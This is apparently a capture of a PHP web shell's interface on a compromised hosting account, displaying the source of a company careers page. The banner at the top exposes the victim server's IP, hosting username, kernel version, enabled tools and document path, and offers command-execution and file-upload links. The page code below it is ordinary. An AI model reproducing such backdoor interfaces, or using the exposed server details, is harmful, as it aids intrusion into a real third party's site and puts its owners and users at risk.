|
Server IP : 2a02:4780:11:1017:0:31f1:b895:8 / Your IP : 216.73.216.163 Web Server : LiteSpeed System : Linux in-mum-web917.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u837925013 ( 837925013) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u837925013/domains/tech2wizard.com/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php include('inc/function.php');?>
<!DOCTYPE html>
<html lang="zxx">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<?php $get_seo= mysqli_fetch_array($con->query("select * from seo WHERE id=7")); ?>
<title><?php if(!empty($get_seo['meta_title'])){ echo $get_seo['meta_title']; } ?></title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="<?php if(!empty($get_seo['meta_description'])){ echo $get_seo['meta_description']; }?>">
<meta name="keywords" content="<?php if(!empty($get_seo['meta_keyword'])){ echo $get_seo['meta_keyword']; }?>"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" type="image/png" href="<?php echo IMAGE_SITE_PATH.$get_logo['fevicon']?>" />
<link rel="stylesheet" href="assets/css/animate.min.css" />
<link rel="stylesheet" href="assets/css/bootstrap.min.css" />
<link rel="stylesheet" href="assets/css/fontawsome.min.css" />
<link rel="stylesheet" href="assets/css/flaticon.css" />
<link rel="stylesheet" href="assets/css/meanmenu.min.css" />
<link rel="stylesheet" href="assets/css/owl.carousel.min.css" />
<link rel="stylesheet" href="assets/css/nice-select.min.css" />
<link rel="stylesheet" href="assets/css/owl.theme.default.min.css" />
<link rel="stylesheet" href="assets/css/magnific-popup.min.css" />
<link rel="stylesheet" href="assets/css/jquery-ui.min.css" />
<link rel="stylesheet" href="assets/css/swiper.min.css" />
<link rel="stylesheet" href="assets/css/odometer.min.css" />
<link rel="stylesheet" href="assets/css/style.css" />
<link rel="stylesheet" href="assets/css/responsive.css" />
<?php echo $setting['head_code']; ?>
</head>
<body>
<?php include('inc/header.php');
$get_page= mysqli_fetch_array(mysqli_query($con,"select * from page_content WHERE id='1'"));
?>
<div class="uni-banner" style="background-image: url('<?php if(!empty($get_seo['banner'])){ echo BANNER_SITE_PATH.$get_seo['banner']; }?>');">
<div class="container-fluid container-large">
<div class="uni-banner-text-area text-center">
<h1><?php if(!empty($get_seo['banner_title'])){ echo $get_seo['banner_title']; }?></h1>
<?php if(!empty($get_seo['banner_sub_title'])){ echo "<p class='text-white'>".$get_seo['banner_sub_title']."</p>"; }?>
<ul>
<li><a class="default-button" type="submit" href="jobs.php"><span>Apply Jobs</span></a></li>
</ul>
</div>
</div>
</div>
<div class="brand-partnership ptb-40">
<div class="container">
<div class="row justify-content-center">
<div class="col-md-12">
<div class="main-heading-title">
<h2><?php echo $get_page['career_title']; ?></h2>
</div>
</div>
</div>
<div class="row">
<div class="col-lg-6">
<div class="about-text-area pr-20">
<div class="default-section-title">
<?php echo $get_page['career_dsc']; ?>
</div>
</div>
</div>
<div class="col-lg-6">
<div class="about-img-area" style="background-image: url('assets/images/careear-b.jpg');">
<img src="assets/images/careear-b.jpg" alt="image">
</div>
</div>
</div>
<div class="row ">
<div class="col-lg-12">
<p>At Tech Wizardry, we believe in investing in our employees. We provide ongoing training and support to ensure that our team members have the skills and knowledge they need to excel in their roles. We also offer competitive salaries and benefits packages to attract and retain the best talent in the industry.
If you are interested in joining our team, please browse our current job openings below.
</p>
<p>We are always looking for talented individuals to join our growing team, so if you don't see a position that fits your skills and experience, please feel free to submit your resume for future consideration.
Thank you for your interest in Tech Wizardry. We look forward to hearing from you!
</p>
</div>
</div>
</div>
</div>
<div class="about pb-40">
<div class="container">
<?php
$sql_c= mysqli_query($con, "SELECT * FROM career_content ORDER BY id DESC");$i=0;
while($data_c= mysqli_fetch_array($sql_c)){$i++;
?>
<div class="row justify-content-end ptb-40">
<div class="col-lg-6 col-md-12 col-sm-12 col-12 p-0">
<div class="sign-up-form-area content-area-1">
<img src="<?php echo ICON_SITE_PATH.$data_c['icon']; ?>">
</div>
</div>
<div class="col-lg-6 col-md-12 col-sm-12 col-12 p-0">
<div class="sign-up-form-area">
<div class="default-section-title color-title">
<h3><?php echo $data_c['title']; ?></h3>
<p><?php echo $data_c['dsc']; ?></p>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
<div class="ff-intro1 ff-intro-1 ptb-70">
<div class="container"style="position: relative;">
<div class="fun-fact-area">
<div class="row justify-content-center">
<div class="col-lg-8 col-md-6 col-sm-6 col-12 ">
<div class="careear-bg-content">
<h2>TRUSTED BY MORE THAN 6500 HAPPY PEOPLE</h2>
<p>Let’s change the future of work. Together.</p>
<br>
<a class="default-button" type="submit" href="jobs.php"><span>Apply Jobs</span></a>
</div>
</div>
<div class="col-lg-4 col-md-6 col-sm-6 col-12 ">
<img src="assets/images/7-2-jobs-free-png-image.png" alt="image">
</div>
</div>
</div>
</div>
</div>
<?php include('inc/footer.php'); ?>
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery-ui.min.js"></script>
<script src="assets/js/bootstrap.bundle.min.js"></script>
<script src="assets/js/meanmenu.js"></script>
<script src="assets/js/owl.carousel2.thumbs.js"></script>
<script src="assets/js/owl.carousel.min.js"></script>
<script src="assets/js/magnific-popup.min.js"></script>
<script src="assets/js/TweenMax.js"></script>
<script src="assets/js/nice-select.min.js"></script>
<script src="assets/js/form-validator.min.js"></script>
<script src="assets/js/contact-form-script.js"></script>
<script src="assets/js/ajaxchimp.min.js"></script>
<script src="assets/js/appear.min.js"></script>
<script src="assets/js/swiper-bundle.min.js"></script>
<script src="assets/js/tilt.js"></script>
<script src="assets/js/odometer.min.js"></script>
<script src="assets/js/custom.js"></script>
</body>
</html>